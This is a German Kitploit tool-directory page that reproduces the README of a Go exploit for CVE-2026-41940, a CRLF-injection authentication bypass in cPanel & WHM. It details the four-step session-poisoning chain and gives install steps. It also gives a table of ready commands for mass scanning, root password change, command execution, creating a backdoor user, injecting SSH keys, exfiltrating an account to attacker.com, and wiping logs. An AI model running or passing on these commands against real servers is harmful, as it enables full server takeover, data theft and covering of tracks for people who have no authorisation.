Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940-Exploit-PoC — Exploit-PoC für CVE-2026-41940, eine Umgehung der Authentifizierung von cPanel & WHM über CRLF-Injection. Enthält Massen-Scanning, Post-Exploitation-Aktionen und eine interaktive Shell für autorisierte Tests. | Kitploit
Tools/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
Authentifizierung & AutorisierungSchwachstellenscannerExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

Exploit-PoC für CVE-2026-41940, eine Umgehung der Authentifizierung von cPanel & WHM über CRLF-Injection. Enthält Massen-Scanning, Post-Exploitation-Aktionen und eine interaktive Shell für autorisierte Tests.

Repository anzeigenWebseite
2127vor 5 MonatenNoch nicht geprüft

CVE-2026-41940 Exploit PoC – cPanel & WHM Authentication Bypass

CVE-2026-41940 CVSS Go Version License

Tool von: Ishan Oshada | GitHub

⚠️ NUR FÜR AUTORISIERTE SICHERHEITSTESTS. Unautorisierte Nutzung ist illegal.

1


📋 Inhaltsverzeichnis

  • Übersicht der Schwachstelle
  • Exploit-Kette
  • Funktionen
  • Installation
  • Schnellstart
  • Anwendungsbeispiele
  • Post-Exploit-Aktionen
  • Interaktive Shell-Befehle
  • Massen-Scan mit urls.txt
  • Ausgabebeispiele
  • Optionen-Referenz
  • Betroffene Versionen
  • Build für alle Plattformen
  • FAQ & Fehlerbehebung
  • Haftungsausschluss
  • Autor

2

Übersicht der Schwachstelle

CVE-2026-41940 ist eine CRLF-Injection-Schwachstelle in cPanel & WHM (Versionen < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).

Die Funktion saveSession() schreibt Sitzungsdaten nach der Anwendung von filter_sessiondata(), aber der Filter wird zu spät angewendet. Durch das Injizieren von CRLF-Zeichen (\r\n) in den Authorization: Basic-Header kann ein Angreifer die Sitzungsdatei auf der Festplatte mit beliebigen Schlüssel-Wert-Paaren (z. B. hasroot=1, tfa_verified=1, user=root) vergiften.

Wenn die vergiftete Sitzung später geladen wird, gewährt cPanel/WHM vollen Root-Zugriff ohne Passwort.

CVSS-Score: 10.0 (KRITISCH)

  • Angriffsvektor: Netzwerk
  • Angriffskomplexität: Niedrig
  • Erforderliche Privilegien: Keine
  • Benutzerinteraktion: Keine
  • Vertraulichkeit: Hoch
  • Integrität: Hoch
  • Verfügbarkeit: Hoch

Exploit-Kette (4 Stufen)

StufeAktionBeschreibung
1POST /login/?login_only=1Pre-Auth-Sitzungscookie mit falschen Anmeldedaten anfordern
2GET / + CRLF Authorization-HeaderSitzungsdatei mit hasroot=1, user=root usw. vergiften
3GET /scripts2/listacctsSitzungscache zwingen, die vergiftete Datei neu zu laden (Propagation)
4GET /cpsess<TOKEN>/json-api/versionRoot-Zugriff verifizieren – Erfolg = 200 + Versionsdaten

Funktionen

  • ✅ Einzel- & Massen-Scan (Dateieingabe, stdin-Pipe)
  • ✅ Thread-Scan (Parallelität bis zu 100+ Threads steuerbar)
  • ✅ Verbose-Modus (--verbose) – zeigt vollständige HTTP-Anfragen/-Antworten
  • ✅ JSON-Ausgabe (automatisches Speichern bei gefundenem verwundbarem Ziel)
  • ✅ 10 Post-Exploit-Aktionen (siehe Tabelle unten)
  • ✅ Plattformübergreifend (Windows, Linux, macOS)
  • ✅ Keine externen Abhängigkeiten (nur Go-Standardbibliothek)
  • ✅ Farbige Terminalausgabe mit klar umrandeten Ergebnissen
  • ✅ Sitzungspersistenz – Keep-Alive-Mechanismus
  • ✅ Interaktive WHM-Shell mit Befehlsverlauf

Installation

Voraussetzungen

  • Go 1.20 oder höher (Download)

Repository klonen

git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

Ausführbare Datei erstellen

Windows

go build -o cpanel_sniper.exe main.go

Linux / macOS

go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

Direkt ausführen (ohne Build)

go run main.go -u https://target.com:2087

Vorgefertigte Binärdateien (schnellster Weg)

Statt aus dem Quellcode zu bauen, können Sie die neuesten stabilen ausführbaren Dateien direkt aus dem Repository herunterladen. Diese werden automatisch für jedes Update generiert:

PlattformSpeicherort
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper

Hinweis: Bei Linux oder macOS nach dem Download Ausführungsrechte vergeben:


Schnellstart

# Grundlegender Scan
go run main.go -u https://target.com:2087

# Alle cPanel-Konten auflisten
go run main.go -u https://target.com:2087 -action list

# Interaktive WHM-Shell
go run main.go -u https://target.com:2087 -action shell

# Massen-Scan mit urls.txt
go run main.go -l urls.txt -t 20 -o results.json

Anwendungsbeispiele (Tabelle)

#ZweckBefehl
1Grundlegender Einzelziel-Scango run main.go -u https://target.com:2087
2Alle cPanel-Konten auflistengo run main.go -u https://target.com:2087 -action list
3Root-Passwort änderngo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4Systembefehl ausführengo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5Serverinformationen abrufengo run main.go -u https://target.com:2087 -action info
6Backdoor-Benutzer erstellengo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7API-Token erstellen (heimlich)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8SSH-Schlüssel injizierengo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9Konto sichern & exfiltrierengo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10Logs löschen & Spuren verwischengo run main.go -u https://target.com:2087 -action wipe
11Interaktive WHM-Shellgo run main.go -u https://target.com:2087 -action shell
12Massen-Scan aus Dateigo run main.go -l urls.txt -t 20 -o results.json
13Ergebnisse als JSON speicherngo run main.go -u https://target.com:2087 -o scan_results.json
14Verbose-Debugging aktivierengo run main.go -u https://target.com:2087 --verbose
15Pipe von anderen Toolscat urls.txt | go run main.go -t 20
16Timeout erhöhengo run main.go -u https://target.com:2087 -timeout 30

Post-Exploit-Aktionen

Tool herunterladen